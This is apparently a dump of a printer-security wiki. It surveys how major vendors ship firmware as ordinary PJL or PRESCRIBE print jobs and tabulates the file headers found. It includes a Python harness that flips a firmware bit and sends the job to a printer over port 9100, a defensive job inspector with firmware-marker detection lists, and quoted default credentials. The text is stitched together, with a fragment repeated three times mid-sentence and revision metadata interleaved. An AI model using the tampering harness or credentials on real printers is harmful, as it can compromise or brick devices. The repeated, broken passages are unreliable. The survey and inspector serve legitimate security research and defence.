Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. 
=== Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms. === Dell === Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. 
Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code>, while 9 <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. 
=== Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. 
In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. 
The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. Unless that hash is itself covered by a digital signature, such a scheme offers no protection against deliberate modification: an attacker who can alter the firmware can recompute a plain hash as well. It may therefore be doubted that the scheme is cryptographically secure.

== Results ==

Out of the ten manufacturers for which firmware files could be obtained, nine use [[PJL]] commands for all or at least some of their firmware update procedures, which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language, which is likewise sent over the printing channel. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself, and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Whoever can submit a print job can also submit a firmware image; whether the device then installs it depends entirely on the verification performed by the device. Exploitation of this issue is nevertheless hard, as for most manufacturers no reasoned statement on protection mechanisms can be made from public documentation. An in-depth analysis of firmware modification attacks should therefore be part of future research.

A summary of file headers or types for all obtained firmware files is given below. The same highlight colour marks the same header recurring at several vendors, which is consistent with rebadged devices.

{| class="wikitable"
|+ File headers or types of all obtained firmware files
|-
! Vendor !! Extension !! Quantity !! File header or type
|-
| rowspan="2" | HP
| rfu || 419 || @PJL UPGRADE SIZE=…
|-
| bdl || 206 || FutureSmart binary format
|-
| rowspan="3" | Epson
| rcx || 49 || SEIKO EPSON EpsonNet Form
|-
| prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span>
|-
| brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span>
|-
| rowspan="6" | Dell
| fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span>
|-
| prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span>
|-
| hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span>
|-
| brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span>
|-
| ps || 2 || PostScript (title: ''Firmware Update'')
|-
| pjl || 1 || @PJL ENTER LANGUAGE=FLASH
|-
| rowspan="2" | Brother
| djf || 79 || @PJL EXECUTE BRDOWNLOAD
|-
| blf || 9 || @PJL ENTER LANGUAGE=PCL
|-
| rowspan="2" | Lexmark
| fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span>
|-
| bin, fls || 6 || Unknown binary format
|-
| rowspan="2" | Samsung
| hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span>
|-
| fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span>
|-
| rowspan="10" | Xerox
| ps || 36 || PostScript (title: ''Firmware Update'')
|-
| dlm || 35 || Xerox Dynamic Loadable Module
|-
| prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span>
|-
| hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span>
|-
| brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span>
|-
| bin || 10 || @PJL SET JOBATTR="@SWDL"
|-
| fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span>
|-
| fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH
|-
| pjl || 3 || @PJL FSDOWNLOAD [name].rpm
|-
| axf || 3 || RISC OS AIF executable
|-
| rowspan="3" | Ricoh
| brn || 15 || @PJL FWDOWNLOAD…
|-
| bin || 14 || @PJL RSYSTEMUPDATE SIZE=…
|-
| fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span>
|-
| rowspan="4" | Kyocera
| cramfs, img || 98 || cramfs image
|-
| bin, squashfs || 79 || squashfs image
|-
| bin, kmmfp || 41 || u-boot legacy uImage
|-
| efi, kmpanel || 13 || proprietary image format
|-
| rowspan="4" | Konica Minolta
| bin || 38 || unknown binary, additional checksum file
|-
| ps || 20 || PostScript (title: ''Softload printer modules'')
|-
| ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE
|-
| upg || 1 || @PJL ENTER LANGUAGE=UPGRADE
|}

'''How to test for this attack?'''

The security of code signing rests on the vendor keeping the private signing key secret for the whole lifetime of the devices. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated to a firmware version that enforces signature checks, or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines; usually this requires some reverse engineering, so testing the feasibility of firmware modification attacks is not trivial.

In a simple test, one can '''flip a single bit''' in the firmware payload (leaving the PJL or PRESCRIBE job header intact) and check whether the modified firmware is still accepted by the printer device. If it is accepted, the device performs no integrity check at all and arbitrary modifications are possible. If it is rejected, either a checksum or a digital signature is verified by the printer. Telling the two apart is not always easy: a checksum can be recomputed by the attacker once the algorithm is known, a signature cannot, and writing malicious firmware (with a correct checksum) can be a time-consuming project. A device that accepts a corrupted image may not boot afterwards, so the test belongs on a device one can afford to lose.

''Other attack scenarios include:''
* Even if the firmware is signed, one may be able to downgrade to an older (signed) firmware version which has known security weaknesses, unless the device refuses images older than the one installed.
* Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easily mountable, and Kyocera firmware contains mountable cramfs and squashfs images).
* Just because firmware is signed doesn't mean it's secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547] (a stack-based buffer overflow in glibc's ''getaddrinfo'').

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
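The bit-flip test described above and the header table before it can be exercised with the following Python script. It is an added example written for this page and is not code from the original wiki, from PRET or from any printer vendor. It splits a firmware job into its print-job header and payload, classifies the file by the header prefixes listed in the table (plus the standard cramfs, squashfs, u-boot uImage and PostScript magic bytes, and the <code>!R! UPGR</code> PRESCRIBE form quoted in the Kyocera section), and produces a copy in which exactly one payload bit is flipped while the header stays intact, so the device still treats the job as a firmware update but the image it has to verify has changed. The sample jobs at the bottom are constructed for the example and are not real firmware; <code>send_raw</code> submits a job over port 9100 and is only needed against a real device, which may fail to boot afterwards if it accepts the corrupted image.

```python
"""Firmware print-job header classifier and single-bit-flip test harness.

Added example for the wiki section above, not code from the original page.
Header prefixes are those listed in the results table; the filesystem magic
numbers are the standard cramfs, squashfs and u-boot uImage constants.
"""
import socket
from typing import List, Optional, Tuple

UEL = b"\x1b%-12345X"  # PJL Universal Exit Language sequence

# Job headers from the results table: (line prefix, deployment mechanism).
# More specific prefixes are listed before shorter ones that would also match.
JOB_SIGNATURES: List[Tuple[bytes, str]] = [
    (b"@PJL UPGRADE SIZE=", "HP remote firmware update (.rfu)"),
    (b"@PJL ENTER LANGUAGE=DOWNLOAD", "ENTER LANGUAGE=DOWNLOAD (Epson, Dell, Xerox)"),
    (b"@PJL ENTER LANGUAGE=FIRMUPDATE", "Konica Minolta FIRMUPDATE"),
    (b"@PJL ENTER LANGUAGE=UPGRADE", "Konica Minolta UPGRADE"),
    (b"@PJL ENTER LANGUAGE=XFLASH", "Xerox XFLASH"),
    (b"@PJL ENTER LANGUAGE=FLASH", "Dell FLASH"),
    (b"@PJL ENTER LANGUAGE=PCL", "Brother PCL-wrapped update (.blf)"),
    (b"@PJL LPROGRAMRIP", "LPROGRAMRIP (Lexmark, Dell, Ricoh)"),
    (b"@PJL FIRMWARE=", "FIRMWARE= (Samsung, Dell, Xerox)"),
    (b"@PJL EXECUTE BRDOWNLOAD", "Brother BRDOWNLOAD (.djf)"),
    (b"@PJL RSYSTEMUPDATE SIZE=", "Ricoh RSYSTEMUPDATE"),
    (b"@PJL FWDOWNLOAD", "Ricoh FWDOWNLOAD"),
    (b"@PJL FSDOWNLOAD", "Xerox FSDOWNLOAD (.rpm)"),
    (b'@PJL SET JOBATTR="@SWDL"', "Xerox software download"),
    (b"@PJL DEFAULT P1284VALUE=", "P1284VALUE (Samsung, Xerox)"),
    (b"!R! UPGR", "Kyocera PRESCRIBE UPGR"),
]
# Images that carry no print-job header at all: (magic bytes, image type).
IMAGE_MAGIC: List[Tuple[bytes, str]] = [
    (b"%!PS", "PostScript firmware update"),
    (b"\x45\x3d\xcd\x28", "cramfs image"),          # 0x28cd3d45, little-endian
    (b"hsqs", "squashfs image"),                     # 0x73717368, little-endian
    (b"\x27\x05\x19\x56", "u-boot legacy uImage"),   # IH_MAGIC, big-endian
]


def split_job(data: bytes) -> Tuple[List[bytes], bytes]:
    """Split a firmware job into (header lines, payload). The header is the
    leading run of UEL sequences, @PJL lines and, for the Kyocera form shown
    above, a PRESCRIBE block ending in 'EXIT;'; the payload is the rest."""
    pos, header = 0, []
    while pos < len(data):
        if data.startswith(UEL, pos):
            pos += len(UEL)
        elif data.startswith(b"@PJL", pos):
            end = data.find(b"\n", pos)
            end = len(data) if end == -1 else end
            header.append(data[pos:end].rstrip(b"\r"))
            pos = min(end + 1, len(data))
        elif data.startswith(b"!R!", pos) and data.find(b"EXIT;", pos) != -1:
            end = data.find(b"EXIT;", pos) + len(b"EXIT;")
            header.append(data[pos:end])
            pos = end
        else:
            break
    return header, data[pos:]


def classify(data: bytes) -> str:
    """Name the deployment mechanism (or raw image type) of a firmware file."""
    header, payload = split_job(data)
    for line in header:
        for prefix, mechanism in JOB_SIGNATURES:
            if line.startswith(prefix):
                return mechanism
    for magic, image_type in IMAGE_MAGIC:
        if payload.startswith(magic):
            return image_type
    return "print job without a known firmware command" if header else "unknown binary"


def flip_bit(data: bytes, bit_offset: Optional[int] = None) -> bytes:
    """Return a copy of the job with exactly one payload bit flipped. The job
    header stays intact, so the device still treats the job as a firmware
    update; bit_offset counts from the payload start (default: its middle)."""
    _, payload = split_job(data)
    if not payload:
        raise ValueError("job carries no payload to modify")
    if bit_offset is None:
        bit_offset = (len(payload) // 2) * 8
    byte_index, bit_index = divmod(bit_offset, 8)
    if byte_index >= len(payload):
        raise ValueError("bit offset lies beyond the payload")
    out = bytearray(data)
    out[len(data) - len(payload) + byte_index] ^= 1 << bit_index
    return bytes(out)


def send_raw(host: str, job: bytes, port: int = 9100, timeout: float = 30.0) -> int:
    """Submit the job via raw port 9100 printing. Only for a device you may brick."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(job + UEL)  # trailing UEL terminates the job
    return len(job)


# Constructed sample jobs (not real firmware): an HP-style .rfu header with a
# 16-byte dummy payload and a Kyocera-style PRESCRIBE job around a cramfs magic.
SAMPLE_RFU = UEL + b"@PJL UPGRADE SIZE=16\r\n" + bytes(range(16))
SAMPLE_KYOCERA = b"!R! UPGR'SYS';EXIT;" + b"\x45\x3d\xcd\x28" + b"\x00" * 12
```

To test a device, read a vendor firmware file, pass it through <code>flip_bit</code> and hand the result to <code>send_raw</code>, then watch whether the printer installs it, rejects it or stops responding. If the unmodified file installs but the flipped one is rejected, the device verifies something; whether that something is a checksum or a signature cannot be told from this test alone.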
one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547].

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547].

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 18aa3e47810ab4164f9b9fd3a93f7fa3e5419254 Fundamentals 0 19 627 330 2017-06-25T11:20:27Z Admin 1 wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. 
While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript.

→ ''Related articles:'' [[Attack carriers]]

== Network printing protocols ==

Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing, but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers, however, are [[LPD]], [[IPP]] and [[Raw|raw port 9100]] printing.

Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios, however, they only act as a '''carrier/channel''' to deploy malicious [[Fundamentals#Printer_Control_Languages|printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document, which broadens the attack surface.

→ ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]]

== Printer Control Languages ==

A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping.
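The two points made above, that firmware rides over the print channel as an ordinary job and that every encapsulation layer (protocol, PJL, page description language) can name its own user, are both things a print server sitting in front of the device can check before forwarding a job. The following inspector is an added example written for this wiki; it is not code from hacking-printers.net, PRET or any printer vendor. It assumes that the print server hands in the protocol-level user (for example the IPP <code>requesting-user-name</code> or the LPD control file's <code>P</code> line), that the PJL layer names its user with the <code>@PJL SET USERNAME</code> variable many drivers emit, and that the PostScript layer does so with the <code>%%For:</code> DSC comment. The firmware markers are the PJL commands from the vendor table above plus Kyocera's PRESCRIBE upgrade command; all sample jobs are constructed, not captured.

```python
"""Layer-aware print-job inspector (added example, not wiki/PRET/vendor code).

It models the encapsulation described above: UEL wraps a PJL header, which
enters a page description language.  Two checks a print server can run before
forwarding a job to the device:
 1. does an inner layer name a different user than the carrier protocol did?
 2. does the job carry one of the firmware-update commands tabulated above?
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

UEL = b"\x1b%-12345X"  # Universal Exit Language sequence that brackets PJL jobs

# Update commands from the vendor table on this page plus Kyocera's PRESCRIBE
# upgrade command.  @PJL FSDOWNLOAD is also PJL's generic file-write command,
# so it fires on non-firmware jobs as well; such jobs deserve a look anyway.
FIRMWARE_MARKERS = (
    b"@PJL UPGRADE SIZE=", b"@PJL ENTER LANGUAGE=DOWNLOAD", b"@PJL LPROGRAMRIP",
    b"@PJL FIRMWARE=", b"@PJL ENTER LANGUAGE=FLASH", b"@PJL EXECUTE BRDOWNLOAD",
    b"@PJL DEFAULT P1284VALUE=", b'@PJL SET JOBATTR="@SWDL"',
    b"@PJL ENTER LANGUAGE=XFLASH", b"@PJL FSDOWNLOAD", b"@PJL FWDOWNLOAD",
    b"@PJL RSYSTEMUPDATE SIZE=", b"@PJL ENTER LANGUAGE=FIRMUPDATE",
    b"@PJL ENTER LANGUAGE=UPGRADE", b"!R! UPGR",
)

# Assumed user-bearing fields: the USERNAME variable drivers commonly set in
# the PJL header, and the %%For: document-structuring comment in PostScript.
PJL_USER = re.compile(rb'^@PJL SET USERNAME="([^"]*)"', re.I)
PJL_ENTER = re.compile(rb"^@PJL ENTER LANGUAGE=(\w+)", re.I)
PS_FOR = re.compile(rb"^%%For:\s*\(?([^)\r\n]*?)\)?\s*$")


@dataclass
class JobReport:
    pdl: Optional[str] = None       # language selected by @PJL ENTER LANGUAGE
    pjl_user: Optional[str] = None  # user named in the PJL layer
    ps_user: Optional[str] = None   # user named in the PostScript layer
    firmware_markers: List[str] = field(default_factory=list)
    findings: List[str] = field(default_factory=list)


def _normalize(line: bytes) -> bytes:
    """Drop a leading UEL and collapse whitespace so 'LANGUAGE = X' matches."""
    line = line.strip(b"\r\n")
    if line.startswith(UEL):  # UEL is usually glued to the first PJL line
        line = line[len(UEL):]
    return re.sub(rb"\s*=\s*", b"=", b" ".join(line.split()))


def inspect_job(job: bytes, protocol_user: Optional[str] = None) -> JobReport:
    """protocol_user is the name the carrier protocol supplied (e.g. the IPP
    requesting-user-name); the calling print server is assumed to pass it."""
    r = JobReport()
    for raw in job.split(b"\n"):
        line = _normalize(raw)
        upper = line.upper()
        if any(upper.startswith(m.upper()) for m in FIRMWARE_MARKERS):
            r.firmware_markers.append(line.decode("ascii", "replace"))
        if m := PJL_ENTER.match(line):
            r.pdl = m.group(1).decode("ascii", "replace").upper()
        elif m := PJL_USER.match(line):
            r.pjl_user = m.group(1).decode("ascii", "replace")
        elif m := PS_FOR.match(line):
            r.ps_user = m.group(1).decode("ascii", "replace").strip()
    if r.firmware_markers:
        r.findings.append("firmware update command inside print job: "
                          + "; ".join(r.firmware_markers))
    for layer, user in (("PJL", r.pjl_user), ("PostScript", r.ps_user)):
        if protocol_user and user and user != protocol_user:
            r.findings.append(f"{layer} user {user!r} differs from "
                              f"protocol user {protocol_user!r}")
    if r.pjl_user and r.ps_user and r.pjl_user != r.ps_user:
        r.findings.append(f"PJL user {r.pjl_user!r} and PostScript user "
                          f"{r.ps_user!r} disagree")
    return r


# Constructed sample jobs; none was captured from a real device or driver.
ORDINARY_JOB = (
    UEL + b'@PJL JOB NAME="report"\r\n@PJL SET USERNAME="bob"\r\n'
    + b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n%!PS-Adobe-3.0\r\n%%For: bob\r\n"
    + b"/Helvetica findfont 12 scalefont setfont 72 700 moveto (hi) show showpage\r\n"
    + UEL
)
# Same job, but the inner layers claim a user other than the protocol sender.
IMPERSONATING_JOB = ORDINARY_JOB.replace(b'"bob"', b'"alice"').replace(b"For: bob", b"For: alice")
# A job entering the DOWNLOAD 'language' (with spacing variant) instead of a PDL.
FIRMWARE_LIKE_JOB = UEL + b"@PJL ENTER LANGUAGE = DOWNLOAD\r\n\x00\x01PLACEHOLDER-NOT-A-REAL-IMAGE\r\n" + UEL
# Kyocera style: the PRESCRIBE upgrade command prepended to the payload.
PRESCRIBE_JOB = b"!R! UPGR'SYS';EXIT;\r\nPLACEHOLDER-NOT-A-REAL-IMAGE\r\n"

if __name__ == "__main__":
    for name, job in [("ordinary", ORDINARY_JOB), ("impersonating", IMPERSONATING_JOB),
                      ("firmware-like", FIRMWARE_LIKE_JOB), ("prescribe", PRESCRIBE_JOB)]:
        report = inspect_job(job, protocol_user="bob")
        print(f"{name}: pdl={report.pdl} findings={report.findings or 'none'}")
```

The inspector only makes sense where the print server is the sole path to the device, which is exactly the condition the accounting section insists on: with direct port 9100 access open, a client simply skips the server and the check with it. The marker list is a string match on the headers observed in the vendor table, so it is a hygiene check for update commands in ordinary traffic, not proof that a device would accept the payload; and because <code>@PJL FSDOWNLOAD</code> is PJL's general file-write command, expect that entry to fire on font or macro downloads too.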
Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]], which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]].

→ ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]]

== Page Description Languages ==

A page description language (PDL) specifies the appearance of the actual document. It must, however, be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low-cost inkjet printers do not support any high-level page description language at all. So-called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS], while the actual rendering is done by the printer driver.
There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. → ''Related articles:'' [[PCL]], [[PostScript]] ----------- 4ad2ae4d9bdeb6fdb644265a4e1389fde0c94f96 330 296 2017-01-31T15:47:37Z Admin 1 wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing 